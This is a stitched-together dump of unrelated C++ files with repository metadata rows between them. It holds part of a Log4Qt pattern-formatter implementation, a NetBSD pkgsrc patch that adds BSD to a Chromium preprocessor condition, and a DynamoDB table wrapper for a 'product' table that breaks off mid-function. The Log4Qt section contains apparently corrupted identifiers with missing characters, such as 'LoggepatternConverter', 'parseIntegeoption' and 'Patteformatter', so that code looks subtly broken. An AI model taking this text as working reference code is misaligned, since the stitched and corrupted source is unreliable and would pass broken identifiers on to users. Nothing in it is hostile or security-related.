QString convert(const LoggingEvent &loggingEvent) const override;
private:
int mPrecision;
};
/*!
* \brief The class MDCPatternConverter converts the MDC data of a
* LoggingEvent to a string.
*
* MDCPatternConverter is used by PatternLayout to convert the MDC data of
* a LoggingEvent to a string as part of formatting the LoggingEvent. It
* handles the 'X' conversion character.
*
* \sa PatternLayout::format()
* \sa PatternConverter::format()
*/
class MDCPatternConverter : public PatternConverter
{
public:
MDCPatternConverter(Log4Qt::FormattingInfo formattingInfo,
const QString &key) :
PatternConverter(formattingInfo),
mKey(key)
{}
private:
Q_DISABLE_COPY(MDCPatternConverter)
protected:
QString convert(const LoggingEvent &loggingEvent) const override;
private:
QString mKey;
};
LOG4QT_DECLARE_STATIC_LOGGER(logger, Log4Qt::PatternFormatter)
PatternFormatter::PatternFormatter(const QString &pattern) :
mIgnoreCharacters(QStringLiteral("C")),
mConversionCharacters(QStringLiteral("cdmprtxXFMLl")),
mOptionCharacters(QStringLiteral("cd")),
mPattern(pattern)
{
parse();
}
PatternFormatter::~PatternFormatter()
{
qDeleteAll(mPatternConverters);
}
QString PatternFormatter::format(const LoggingEvent &loggingEvent) const
{
QString result;
for (auto &&p_converter : qAsConst(mPatternConverters))
p_converter->format(result, loggingEvent);
return result;
}
bool PatternFormatter::addDigit(QChar digit,
int &value)
{
if (!digit.isDigit())
return false;
int digit_value = digit.digitValue();
if (value > (INT_MAX - digit_value) / 10)
value = INT_MAX;
else
value = value * 10 + digit_value;
return true;
}
void PatternFormatter::createConverter(QChar character,
Log4Qt::FormattingInfo formattingInfo,
const QString &option)
{
Q_ASSERT_X(mConversionCharacters.indexOf(character) >= 0, "PatternFormatter::createConverter", "Unknown conversion character" );
LogError e("Creating Converter for character '%1' min %2, max %3, left %4 and option '%5'");
e << QString(character)
<< FormattingInfo::intToString(formattingInfo.mMinLength)
<< FormattingInfo::intToString(formattingInfo.mMaxLength)
<< formattingInfo.mLeftAligned
<< option;
logger()->trace(e);
switch (character.toLatin1())
{
case 'c':
mPatternConverters << new LoggepatternConverter(formattingInfo,
parseIntegeoption(option));
break;
case 'd':
{
QString format = option;
if (option.isEmpty())
format = QStringLiteral("ISO8601");
else if (option == QLatin1String("locale:long"))
format = QLocale().dateTimeFormat(QLocale::LongFormat);
else if (option == QLatin1String("locale:short"))
format = QLocale().dateTimeFormat(QLocale::ShortFormat);
else if (option == QLatin1String("locale:narrow"))
format = QLocale().dateTimeFormat(QLocale::NarrowFormat);
else if (option == QLatin1String("locale"))
format = QLocale().dateTimeFormat(QLocale::ShortFormat);
mPatternConverters << new DatePatternConverter(formattingInfo,
format);
break;
}
case 'm':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::MESSAGE_CONVERTER);
break;
case 'p':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::LEVEL_CONVERTER);
break;
case 'r':
mPatternConverters << new DatePatternConverter(formattingInfo,
QStringLiteral("RELATIVE"));
break;
case 't':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::THREAD_CONVERTER);
break;
case 'x':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::NDC_CONVERTER);
break;
case 'X':
mPatternConverters << new MDCPatternConverter(formattingInfo,
option);
break;
case 'F':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::FILENAME_CONVERTER);
break;
case 'M':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::FUNCTIONNAME_CONVERTER);
break;
case 'L':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::LINENUMBER_CONVERTER);
break;
case 'l':
mPatternConverters << new BasicPatternConverter(formattingInfo,
BasicPatternConverter::LOCATION_CONVERTER);
break;
default:
Q_ASSERT_X(false, "PatternFormatter::createConverter", "Unknown pattern character");
}
}
void PatternFormatter::createLiteralConverter(const QString &literal)
{
logger()->trace(QStringLiteral("Creating literal LiteralConverter with Literal '%1'"),
literal);
mPatternConverters << new LiteralPatternConverter(literal);
}
void PatternFormatter::parse()
{
enum State
{
LITERAL_STATE,
ESCAPE_STATE,
MIN_STATE,
DOT_STATE,
MAX_STATE,
CHARACTER_STATE,
POSSIBLEOPTION_STATE,
OPTION_STATE
};
int i = 0;
QChar c;
char ch;
State state = LITERAL_STATE;
FormattingInfo formatting_info;
QString literal;
int converter_start = 0;
int option_start = 0;
while (i < mPattern.length())
{
// i points to the current character
// c contains the current character
// ch contains the Latin1 equivalent of the current character
// i is incremented at the end of the loop to consume the character
// continue is used to change state without consuming the character
c = mPattern.at(i);
ch = c.toLatin1();
switch (state)
{
case LITERAL_STATE:
if (ch == '%')
{
formatting_info.clear();
converter_start = i;
state = ESCAPE_STATE;
}
else
literal += c;
break;
case ESCAPE_STATE:
if (ch == '%')
{
literal += c;
state = LITERAL_STATE;
}
else if (ch == 'n')
{
literal += Layout::endOfLine();
state = LITERAL_STATE;
}
else
{
if (!literal.isEmpty())
{
createLiteralConverter(literal);
literal.clear();
}
if (ch == '-')
formatting_info.mLeftAligned = true;
else if (c.isDigit())
{
formatting_info.mMinLength = c.digitValue();
state = MIN_STATE;
}
else if (ch == '.')
state = DOT_STATE;
else
{
state = CHARACTER_STATE;
continue;
}
}
break;
case MIN_STATE:
if (!addDigit(c, formatting_info.mMinLength))
{
if (ch == '.')
state = DOT_STATE;
else
{
state = CHARACTER_STATE;
continue;
}
}
break;
case DOT_STATE:
if (c.isDigit())
{
formatting_info.mMaxLength = c.digitValue();
state = MAX_STATE;
}
else
{
LogError e = LOG4QT_ERROR(QT_TR_NOOP("Found character '%1' where digit was expected."),
LAYOUT_EXPECTED_DIGIT_ERROR,
"Log4Qt::PatternFormatter");
e << QString(c);
logger()->error(e);
}
break;
case MAX_STATE:
if (!addDigit(c, formatting_info.mMaxLength))
{
state = CHARACTER_STATE;
continue;
}
break;
case CHARACTER_STATE:
if (mIgnoreCharacters.indexOf(c) >= 0)
state = LITERAL_STATE;
else if (mOptionCharacters.indexOf(c) >= 0)
state = POSSIBLEOPTION_STATE;
else if (mConversionCharacters.indexOf(c) >= 0)
{
createConverter(c, formatting_info);
state = LITERAL_STATE;
}
else
{
logger()->warn(QStringLiteral("Invalid conversion character '%1' at %2 in pattern '%3'"),
c, i, mPattern);
createLiteralConverter(mPattern.mid(converter_start, i - converter_start + 1));
state = LITERAL_STATE;
}
break;
case POSSIBLEOPTION_STATE:
if (ch == '{')
{
option_start = i;
state = OPTION_STATE;
}
else
{
createConverter(mPattern.at(i - 1),
formatting_info);
state = LITERAL_STATE;
continue;
}
break;
case OPTION_STATE:
if (ch == '}')
{
createConverter(mPattern.at(option_start - 1),
formatting_info,
mPattern.mid(option_start + 1, i - option_start - 1));
state = LITERAL_STATE;
}
break;
default:
Q_ASSERT_X(false, "PatternFormatter::parse()", "Unknown parsing state constant");
state = LITERAL_STATE;
}
i++;
}
if (state != LITERAL_STATE)
{
logger()->warn(QStringLiteral("Unexptected end of pattern '%1'"), mPattern);
if (state == ESCAPE_STATE)
literal += c;
else
literal += mPattern.mid(converter_start);
}
if (!literal.isEmpty())
createLiteralConverter(literal);
}
int PatternFormatter::parseIntegeoption(const QString &option)
{
if (option.isEmpty())
return 0;
bool ok;
int result = option.toInt(&ok);
if (!ok)
{
LogError e = LOG4QT_ERROR(QT_TR_NOOP("Option '%1' cannot be converted into an integer"),
LAYOUT_OPTION_IS_NOT_INTEGER_ERROR,
"Log4Qt::Patteformatter");
e << option;
logger()->error(e);
}
if (result < 0)
{
LogError e = LOG4QT_ERROR(QT_TR_NOOP("Option %1 isn't a positive integer"),
LAYOUT_INTEGER_IS_NOT_POSITIVE_ERROR,
"Log4Qt::Patteformatter");
e << result;
logger()->error(e);
result = 0;
}
return result;
}
void FormattingInfo::clear()
{
mMinLength = 0;
mMaxLength = INT_MAX;
mLeftAligned = false;
}
QString FormattingInfo::intToString(int i)
{
if (i == INT_MAX)
return QStringLiteral("INT_MAX");
return QString::number(i);
}
void PatternConverter::format(QString &format, const LoggingEvent &loggingEvent) const
{
Q_DECL_CONSTEXPR const QLatin1Char space(' ');
const QString s = convert(loggingEvent);
// If the data item is longer than the maximum field, then the extra characters
// are removed from the beginning of the data item and not from the end.
if (s.length() > mFormattingInfo.mMaxLength)
format += s.right(mFormattingInfo.mMaxLength);
else if (mFormattingInfo.mLeftAligned)
format += s.leftJustified(mFormattingInfo.mMinLength, space, false);
else
format += s.rightJustified(mFormattingInfo.mMinLength, space, false);
}
QString BasicPatternConverter::convert(const LoggingEvent &loggingEvent) const
{
switch (mType)
{
case MESSAGE_CONVERTER:
return loggingEvent.message();
case NDC_CONVERTER:
return loggingEvent.ndc();
case LEVEL_CONVERTER:
return loggingEvent.level().toString();
case THREAD_CONVERTER:
return loggingEvent.threadName();
case FILENAME_CONVERTER:
return loggingEvent.context().file;
case LINENUMBER_CONVERTER:
return QString::number(loggingEvent.context().line);
case FUNCTIONNAME_CONVERTER:
return loggingEvent.context().function;
case LOCATION_CONVERTER:
return QStringLiteral("%1:%2 - %3").arg(loggingEvent.context().file, QString::number(loggingEvent.context().line), loggingEvent.context().function);
case CATEGORYNAME_CONVERTER:
return loggingEvent.categoryName();
default:
Q_ASSERT_X(false, "BasicPatternConverter::convert()", "Unknown type constant");
return QString();
}
}
QString DatePatternConverter::convert(const LoggingEvent &loggingEvent) const
{
return DateTime::fromMSecsSinceEpoch(loggingEvent.timeStamp()).toString(mFormat);
}
QString LiteralPatternConverter::convert(const LoggingEvent &loggingEvent) const
{
Q_UNUSED(loggingEvent);
return mLiteral;
}
QString LoggepatternConverter::convert(const LoggingEvent &loggingEvent) const
{
if (!loggingEvent.logger())
return QString();
QString name;
if (loggingEvent.logger() == LogManager::instance()->qtLogger()) // is qt logger
if (loggingEvent.categoryName().isEmpty())
name = LogManager::instance()->qtLogger()->name();
else
name = loggingEvent.categoryName();
else
name = loggingEvent.logger()->name();
if (mPrecision <= 0 || (name.isEmpty()))
return name;
const QString separator(QStringLiteral("::"));
int i = mPrecision;
int begin = name.length();
while ((i > 0) && (begin >= 0))
{
begin = name.lastIndexOf(separator, begin - name.length() - 1);
i--;
}
if (begin < 0)
begin = 0;
else
begin += 2;
return name.mid(begin);
}
QString MDCPatternConverter::convert(const LoggingEvent &loggingEvent) const
{
return loggingEvent.mdc().value(mKey);
}
} // namespace Log4Qt
|
512602093168c377c4aba3d723242a34a8d4b620 | 376e1818d427b5e4d32fa6dd6c7b71e9fd88afdb | /x11/qt5-qtwebengine/patches/patch-src_3rdparty_chromium_ui_gfx_gpu__memory__buffer.cc | 85c4527550f57d6ff358ff54f35fd983a452d398 | [] | no_license | NetBSD/pkgsrc | a0732c023519650ef821ab89c23ab6ab59e25bdb | d042034ec4896cc5b47ed6f2e5b8802d9bc5c556 | refs/heads/trunk | 2023-09-01T07:40:12.138283 | 2023-09-01T05:25:19 | 2023-09-01T05:25:19 | 88,439,572 | 321 | 138 | null | 2023-07-12T22:34:14 | 2017-04-16T20:04:15 | null | UTF-8 | C++ | false | false | 695 | cc | patch-src_3rdparty_chromium_ui_gfx_gpu__memory__buffer.cc | $NetBSD: patch-src_3rdparty_chromium_ui_gfx_gpu__memory__buffer.cc,v 1.2 2022/04/18 11:18:19 adam Exp $
--- src/3rdparty/chromium/ui/gfx/gpu_memory_buffer.cc.orig 2021-02-19 16:41:59.000000000 +0000
+++ src/3rdparty/chromium/ui/gfx/gpu_memory_buffer.cc
@@ -34,7 +34,7 @@ GpuMemoryBufferHandle GpuMemoryBufferHan
handle.region = region.Duplicate();
handle.offset = offset;
handle.stride = stride;
-#if defined(OS_LINUX) || defined(OS_CHROMEOS) || defined(OS_FUCHSIA)
+#if defined(OS_LINUX) || defined(OS_CHROMEOS) || defined(OS_FUCHSIA) || defined(OS_BSD)
handle.native_pixmap_handle = CloneHandleForIPC(native_pixmap_handle);
#elif defined(OS_MAC)
handle.mach_port = mach_port;
|
fbfa32675411a047902d60aefa3190b5c4246772 | 3f5ded8aab22d0f18a3ae9facb49e716e03344ac | /common/aws_tbl/aws_table_product.cpp | 7561f794f58c40212403972c52a359e751232b45 | [] | no_license | jyqiu1216/login_center | 2c3ea220acc11f3153e4308c02b1dbda62ae334d | 2404a885b407310f825ed4262ad6663bf1dcdbc5 | refs/heads/master | 2020-05-22T06:53:34.861623 | 2017-01-03T01:12:48 | 2017-01-03T01:12:48 | 65,727,955 | 0 | 0 | null | null | null | null | GB18030 | C++ | false | false | 23,212 | cpp | aws_table_product.cpp | #include "aws_table_product.h"
TableDesc TbProduct::oTableDesc;
int TbProduct::Init(const string& sConfFile, const string strProjectName)
{
CFieldProperty fld_prop;
if (fld_prop.Init(sConfFile.c_str()) == false)
{
assert(0);
return -1;
}
fld_prop.GetTableInfo(&oTableDesc);
oTableDesc.m_strProjectName = strProjectName;
AwsTable::AddNewObjectFunc(oTableDesc.sName, NewObject);
return 0;
}
AwsTable* TbProduct::NewObject()
{
return new TbProduct;
}
string TbProduct::GetTableName()
{
ostringstream oss;
if(!oTableDesc.m_strProjectName.empty())
{
//oss << oTableDesc.m_strProjectName << "_";
}
oss << "account_";
oss << oTableDesc.sName;
return oss.str();
}
TINT32 TbProduct::GetTableIdx()
{
return 0;
}
AwsMap* TbProduct::OnScanReq(unsigned int udwIdxNo, bool bHasStartKey, bool bReturnConsumedCapacity,
unsigned int dwLimit, unsigned int dwSegment, unsigned int dwTotalSegments)
{
oJsonWriter.omitEndingLineFeed();
assert(oTableDesc.mIndexDesc.find(udwIdxNo)!=oTableDesc.mIndexDesc.end());
IndexDesc& idx_desc = oTableDesc.mIndexDesc[udwIdxNo];
assert(idx_desc.sName == "PRIMARY"); //只能通过主键查询
AwsMap* pScan = new AwsMap;
assert(pScan);
pScan->AddValue("/TableName", GetTableName());
if (idx_desc.vecRtnFld.empty())
{
pScan->AddValue("/Select", "ALL_ATTRIBUTES");
}
else
{
ostringstream oss;
for (unsigned int i = 0; i < idx_desc.vecRtnFld.size(); ++i)
{
oss.str("");
oss << "/AttributesToGet[" << i << "]";
FieldDesc& fld_desc = oTableDesc.mFieldDesc[idx_desc.vecRtnFld[i]];
pScan->AddValue(oss.str(), fld_desc.sName);
}
}
if (dwLimit > 0)
{
pScan->AddNumber("/Limit", dwLimit);
}
if (bReturnConsumedCapacity)
{
pScan->AddValue("/ReturnConsumedCapacity", "TOTAL");
}
if (dwTotalSegments > 0)
{
pScan->AddNumber("/Segment", dwSegment);
pScan->AddNumber("/TotalSegments", dwTotalSegments);
}
if (bHasStartKey)
{
pScan->AddValue("/ExclusiveStartKey/app_uid/S",m_sApp_uid);
pScan->AddValue("/ExclusiveStartKey/r_pid/S",m_sR_pid);
}
return pScan;
}
int TbProduct::OnScanReq(string& sPostData, unsigned int udwIdxNo, bool bHasStartKey, bool bReturnConsumedCapacity,
unsigned int dwLimit, unsigned int dwSegment, unsigned int dwTotalSegments)
{
AwsMap* pScan = OnScanReq(udwIdxNo, bHasStartKey, bReturnConsumedCapacity, dwLimit, dwSegment, dwTotalSegments);
ostringstream oss;
pScan->Dump(oss);
sPostData = oss.str();
delete pScan;
return 0;
}
int TbProduct::OnScanRsp(const Json::Value& item)
{
return OnResponse(item);
}
AwsMap* TbProduct::OnQueryReq(unsigned int udwIdxNo, const CompareDesc& comp_desc,
bool bConsistentRead, bool bReturnConsumedCapacity, bool bScanIndexForward, unsigned int dwLimit, bool bCount)
{
oJsonWriter.omitEndingLineFeed();
assert(oTableDesc.mIndexDesc.find(udwIdxNo)!=oTableDesc.mIndexDesc.end());
IndexDesc& idx_desc = oTableDesc.mIndexDesc[udwIdxNo];
AwsMap* pQuery = new AwsMap;
assert(pQuery);
pQuery->AddValue("/TableName", GetTableName());
pQuery->AddBoolean("/ConsistentRead", bConsistentRead);
if (!bScanIndexForward)
{
pQuery->AddBoolean("/ScanIndexForward", bScanIndexForward);
}
if (idx_desc.sName != "PRIMARY")
{
pQuery->AddValue("/IndexName", idx_desc.sName);
}
if (bCount)
{
pQuery->AddValue("/Select", "COUNT");
}
else if (idx_desc.vecRtnFld.empty())
{
pQuery->AddValue("/Select", "ALL_ATTRIBUTES");
}
else
{
ostringstream oss;
for (unsigned int i = 0; i < idx_desc.vecRtnFld.size(); ++i)
{
oss.str("");
oss << "/AttributesToGet[" << i << "]";
FieldDesc& fld_desc = oTableDesc.mFieldDesc[idx_desc.vecRtnFld[i]];
pQuery->AddValue(oss.str(), fld_desc.sName);
}
}
if (dwLimit > 0)
{
pQuery->AddNumber("/Limit", dwLimit);
}
if (bReturnConsumedCapacity)
{
pQuery->AddValue("/ReturnConsumedCapacity", "TOTAL");
}
for (unsigned int i = 0; i < idx_desc.vecIdxFld.size(); ++i)
{
FieldDesc& fld_desc = oTableDesc.mFieldDesc[idx_desc.vecIdxFld[i]];
if (i == 0) //0只能是hash key,HASH KEY只能是EQ方式
{
if(fld_desc.udwFldNo == TbPRODUCT_FIELD_APP_UID)
{
pQuery->AddValue("/KeyConditions/app_uid/AttributeValueList[0]/S", m_sApp_uid);
pQuery->AddValue("/KeyConditions/app_uid/ComparisonOperator", "EQ");
}
if(fld_desc.udwFldNo == TbPRODUCT_FIELD_R_PID)
{
pQuery->AddValue("/KeyConditions/r_pid/AttributeValueList[0]/S", m_sR_pid);
pQuery->AddValue("/KeyConditions/r_pid/ComparisonOperator", "EQ");
}
if(fld_desc.udwFldNo == TbPRODUCT_FIELD_DEVICE)
{
pQuery->AddValue("/KeyConditions/device/AttributeValueList[0]/S", m_sDevice);
pQuery->AddValue("/KeyConditions/device/ComparisonOperator", "EQ");
}
if(fld_desc.udwFldNo == TbPRODUCT_FIELD_RID)
{
pQuery->AddValue("/KeyConditions/rid/AttributeValueList[0]/S", m_sRid);
pQuery->AddValue("/KeyConditions/rid/ComparisonOperator", "EQ");
}
}
else if (i == 1) //1只能是rangekey or local index,可以有多种方式
{
if (COMPARE_TYPE_EQ<=comp_desc.dwCompareType && comp_desc.dwCompareType<=COMPARE_TYPE_GT)
{
if(fld_desc.udwFldNo == TbPRODUCT_FIELD_R_PID)
{
pQuery->AddValue("/KeyConditions/r_pid/AttributeValueList[0]/S", m_sR_pid);
pQuery->AddValue("/KeyConditions/r_pid/ComparisonOperator", CompareType2Str(comp_desc.dwCompareType));
}
}
else if (COMPARE_TYPE_BETWEEN == comp_desc.dwCompareType)
{
if(fld_desc.udwFldNo == TbPRODUCT_FIELD_R_PID)
{
pQuery->AddValue("/KeyConditions/r_pid/AttributeValueList[0]/S" , comp_desc.vecS[0]);
pQuery->AddValue("/KeyConditions/r_pid/AttributeValueList[1]/S" , comp_desc.vecS[1]);
pQuery->AddValue("/KeyConditions/r_pid/ComparisonOperator", "BETWEEN");
}
}
else
{
assert(0);
}
}
else
{
assert(0);
}
}
return pQuery;
}
int TbProduct::OnQueryReq(string& sPostData, unsigned int udwIdxNo, const CompareDesc& comp_desc,
bool bConsistentRead, bool bReturnConsumedCapacity, bool bScanIndexForward, unsigned int dwLimit)
{
oJsonWriter.omitEndingLineFeed();
AwsMap* pQuery = OnQueryReq(udwIdxNo, comp_desc, bConsistentRead, bReturnConsumedCapacity, bScanIndexForward, dwLimit);
ostringstream oss;
pQuery->Dump(oss);
sPostData = oss.str();
delete pQuery;
return 0;
}
int TbProduct::OnQueryRsp(const Json::Value& item)
{
return OnResponse(item);
}
int TbProduct::OnCountReq(string& sPostData, unsigned int udwIdxNo, const CompareDesc& comp_desc,
bool bConsistentRead, bool bReturnConsumedCapacity, bool bScanIndexForward, unsigned int dwLimit)
{
AwsMap* pQuery = OnQueryReq(udwIdxNo, comp_desc, bConsistentRead, bReturnConsumedCapacity, bScanIndexForward, dwLimit, true);
ostringstream oss;
pQuery->Dump(oss);
sPostData = oss.str();
delete pQuery;
return 0;
}
AwsMap* TbProduct::OnUpdateItemReq(
const ExpectedDesc& expected_desc, int dwReturnValuesType, bool bReturnConsumedCapacity)
{
oJsonWriter.omitEndingLineFeed();
if (m_mFlag.size() == 0) //没有变化
{
return NULL;
}
AwsMap* pUpdateItem = new AwsMap;
assert(pUpdateItem);
string sBase64Encode;
string sJsonEncode;
bool bUpdateFlag = false;
pUpdateItem->AddValue("/TableName", GetTableName());
if (bReturnConsumedCapacity)
{
pUpdateItem->AddValue("/ReturnConsumedCapacity", "TOTAL");
}
if (dwReturnValuesType > RETURN_VALUES_NONE)
{
pUpdateItem->AddValue("/ReturnValues", ReturnValuesType2Str(dwReturnValuesType));
}
pUpdateItem->AddValue("/Key/app_uid/S", m_sApp_uid);
pUpdateItem->AddValue("/Key/r_pid/S", m_sR_pid);
for (map<unsigned int, int>::iterator iter = m_mFlag.begin(); iter != m_mFlag.end(); ++iter)
{
bUpdateFlag = true;
if (TbPRODUCT_FIELD_SID == iter->first)
{
if(UPDATE_ACTION_TYPE_DELETE == iter->second)
{
pUpdateItem->AddValue("/AttributeUpdates/sid/Action", "DELETE");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/sid/Value/N", m_nSid);
pUpdateItem->AddValue("/AttributeUpdates/sid/Action", UpdateActionType2Str(iter->second));
}
continue;
}
if (TbPRODUCT_FIELD_DEVICE == iter->first)
{
if (!m_sDevice.empty())
{
pUpdateItem->AddValue("/AttributeUpdates/device/Value/S", JsonEncode(m_sDevice, sJsonEncode));
pUpdateItem->AddValue("/AttributeUpdates/device/Action", "PUT");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/device/Action", "DELETE");
}
continue;
}
if (TbPRODUCT_FIELD_RID == iter->first)
{
if (!m_sRid.empty())
{
pUpdateItem->AddValue("/AttributeUpdates/rid/Value/S", JsonEncode(m_sRid, sJsonEncode));
pUpdateItem->AddValue("/AttributeUpdates/rid/Action", "PUT");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/rid/Action", "DELETE");
}
continue;
}
if (TbPRODUCT_FIELD_PRODUCT_INFO == iter->first)
{
if (!m_sProduct_info.empty())
{
pUpdateItem->AddValue("/AttributeUpdates/product_info/Value/S", JsonEncode(m_sProduct_info, sJsonEncode));
pUpdateItem->AddValue("/AttributeUpdates/product_info/Action", "PUT");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/product_info/Action", "DELETE");
}
continue;
}
if (TbPRODUCT_FIELD_BTIME == iter->first)
{
if(UPDATE_ACTION_TYPE_DELETE == iter->second)
{
pUpdateItem->AddValue("/AttributeUpdates/btime/Action", "DELETE");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/btime/Value/N", m_nBtime);
pUpdateItem->AddValue("/AttributeUpdates/btime/Action", UpdateActionType2Str(iter->second));
}
continue;
}
if (TbPRODUCT_FIELD_LGTIME == iter->first)
{
if(UPDATE_ACTION_TYPE_DELETE == iter->second)
{
pUpdateItem->AddValue("/AttributeUpdates/lgtime/Action", "DELETE");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/lgtime/Value/N", m_nLgtime);
pUpdateItem->AddValue("/AttributeUpdates/lgtime/Action", UpdateActionType2Str(iter->second));
}
continue;
}
if (TbPRODUCT_FIELD_STATUS == iter->first)
{
if(UPDATE_ACTION_TYPE_DELETE == iter->second)
{
pUpdateItem->AddValue("/AttributeUpdates/status/Action", "DELETE");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/status/Value/N", m_nStatus);
pUpdateItem->AddValue("/AttributeUpdates/status/Action", UpdateActionType2Str(iter->second));
}
continue;
}
if (TbPRODUCT_FIELD_SEQ == iter->first)
{
if(UPDATE_ACTION_TYPE_DELETE == iter->second)
{
pUpdateItem->AddValue("/AttributeUpdates/seq/Action", "DELETE");
}
else
{
pUpdateItem->AddValue("/AttributeUpdates/seq/Value/N", m_nSeq);
pUpdateItem->AddValue("/AttributeUpdates/seq/Action", UpdateActionType2Str(iter->second));
}
continue;
}
assert(0);
}
if(bUpdateFlag)
{
++m_nSeq;
pUpdateItem->AddValue("/AttributeUpdates/seq/Value/N", m_nSeq);
pUpdateItem->AddValue("/AttributeUpdates/seq/Action", "PUT");
}
ostringstream oss;
for (unsigned int i = 0; i < expected_desc.vecExpectedItem.size(); ++i)
{
const ExpectedItem& item = expected_desc.vecExpectedItem[i];
FieldDesc& fld_desc = oTableDesc.mFieldDesc[item.udwFldNo];
oss.str("");
oss << "/Expected/" << fld_desc.sName << "/Exists";
pUpdateItem->AddBoolean(oss.str(), item.bExists);
if (item.bExists) //Exists为true时才需要Value
{
oss.str("");
oss << "/Expected/" << fld_desc.sName << "/Value/" << DataType2Str(fld_desc.dwType);
if (FIELD_TYPE_N == fld_desc.dwType)
{
pUpdateItem->AddValue(oss.str(), item.nValue);
continue;
}
if (FIELD_TYPE_S == fld_desc.dwType)
{
pUpdateItem->AddValue(oss.str(), item.sValue);
continue;
}
//FIELD_TYPE_B型不能expected
assert(0);
}
}
return pUpdateItem;
}
int TbProduct::OnUpdateItemReq(string& sPostData,
const ExpectedDesc& expected_desc, int dwReturnValuesType, bool bReturnConsumedCapacity)
{
AwsMap* pUpdateItem = OnUpdateItemReq(expected_desc, dwReturnValuesType, bReturnConsumedCapacity);
if (!pUpdateItem)
{
sPostData.clear();
return 0;
}
ostringstream oss;
pUpdateItem->Dump(oss);
sPostData = oss.str();
delete pUpdateItem;
return 0;
}
int TbProduct::OnUpdateItemRsp(const Json::Value& item)
{
return OnResponse(item);
}
AwsMap* TbProduct::OnWriteItemReq(int dwActionType)
{
++m_nSeq;
oJsonWriter.omitEndingLineFeed();
AwsMap* pWriteItem = new AwsMap;
assert(pWriteItem);
string sBase64Encode;
string sJsonEncode;
AwsMap* pItem = NULL;
if (WRITE_ACTION_TYPE_PUT == dwActionType)
{
pItem = pWriteItem->GetAwsMap("PutRequest")->GetAwsMap("Item");
if (!m_sApp_uid.empty())
{
pItem->AddValue("/app_uid/S", JsonEncode(m_sApp_uid, sJsonEncode));
}
if (!m_sR_pid.empty())
{
pItem->AddValue("/r_pid/S", JsonEncode(m_sR_pid, sJsonEncode));
}
pItem->AddValue("/sid/N", m_nSid);
if (!m_sDevice.empty())
{
pItem->AddValue("/device/S", JsonEncode(m_sDevice, sJsonEncode));
}
if (!m_sRid.empty())
{
pItem->AddValue("/rid/S", JsonEncode(m_sRid, sJsonEncode));
}
if (!m_sProduct_info.empty())
{
pItem->AddValue("/product_info/S", JsonEncode(m_sProduct_info, sJsonEncode));
}
pItem->AddValue("/btime/N", m_nBtime);
pItem->AddValue("/lgtime/N", m_nLgtime);
pItem->AddValue("/status/N", m_nStatus);
pItem->AddValue("/seq/N", m_nSeq);
}
else if (WRITE_ACTION_TYPE_DELETE == dwActionType)
{
pItem = pWriteItem->GetAwsMap("DeleteRequest")->GetAwsMap("Key");
pItem->AddValue("/app_uid/S", m_sApp_uid);
pItem->AddValue("/r_pid/S", m_sR_pid);
}
else
{
assert(0);
}
return pWriteItem;
}
void TbProduct::OnWriteItemReq(AwsMap* pWriteItem, int dwActionType)
{
++m_nSeq;
assert(pWriteItem);
string sBase64Encode;
string sJsonEncode;
AwsMap* pReqItem = new AwsMap;
assert(pReqItem);
AwsMap* pItem = NULL;
if (WRITE_ACTION_TYPE_PUT == dwActionType)
{
pItem = pReqItem->GetAwsMap("PutRequest")->GetAwsMap("Item");
if (!m_sApp_uid.empty())
{
pItem->AddValue("/app_uid/S", JsonEncode(m_sApp_uid, sJsonEncode));
}
if (!m_sR_pid.empty())
{
pItem->AddValue("/r_pid/S", JsonEncode(m_sR_pid, sJsonEncode));
}
pItem->AddValue("/sid/N", m_nSid);
if (!m_sDevice.empty())
{
pItem->AddValue("/device/S", JsonEncode(m_sDevice, sJsonEncode));
}
if (!m_sRid.empty())
{
pItem->AddValue("/rid/S", JsonEncode(m_sRid, sJsonEncode));
}
if (!m_sProduct_info.empty())
{
pItem->AddValue("/product_info/S", JsonEncode(m_sProduct_info, sJsonEncode));
}
pItem->AddValue("/btime/N", m_nBtime);
pItem->AddValue("/lgtime/N", m_nLgtime);
pItem->AddValue("/status/N", m_nStatus);
pItem->AddValue("/seq/N", m_nSeq);
}
else if (WRITE_ACTION_TYPE_DELETE == dwActionType)
{
pItem = pReqItem->GetAwsMap("DeleteRequest")->GetAwsMap("Key");
pItem->AddValue("/app_uid/S", m_sApp_uid);
pItem->AddValue("/r_pid/S", m_sR_pid);
}
else
{
assert(0);
}
pWriteItem->GetAwsMap("RequestItems")->GetAwsList(GetTableName())->SetValue(pReqItem, true);
}
AwsMap* TbProduct::OnReadItemReq(unsigned int udwIdxNo)
{
oJsonWriter.omitEndingLineFeed();
IndexDesc& idx_desc = oTableDesc.mIndexDesc[udwIdxNo];
assert(idx_desc.sName == "PRIMARY"); //只能通过主键查询
AwsMap* pReadItem = new AwsMap;
assert(pReadItem);
pReadItem->AddValue("/Keys[0]/app_uid/S", m_sApp_uid);
pReadItem->AddValue("/Keys[0]/r_pid/S", m_sR_pid);
ostringstream oss;
for (unsigned int i = 0; i < idx_desc.vecRtnFld.size(); ++i)
{
oss.str("");
oss << "/AttributesToGet[" << i << "]";
FieldDesc& fld_desc = oTableDesc.mFieldDesc[idx_desc.vecRtnFld[i]];
pReadItem->AddValue(oss.str(), fld_desc.sName);
}
return pReadItem;
}
void TbProduct::OnReadItemReq(AwsMap* pReadItem)
{
assert(pReadItem);
AwsList* pKeys = pReadItem->GetAwsMap("RequestItems")->GetAwsMap(GetTableName())->GetAwsList("Keys");
AwsMap* pKey = new AwsMap;
assert(pKey);
pKey->AddValue("/app_uid/S", m_sApp_uid);
pKey->AddValue("/r_pid/S", m_sR_pid);
pKeys->SetValue(pKey, true);
}
int TbProduct::OnReadItemRsp(const Json::Value& item)
{
return OnResponse(item);
}
AwsMap* TbProduct::OnDeleteItemReq(
const ExpectedDesc& expected_desc, int dwReturnValuesType, bool bReturnConsumedCapacity)
{
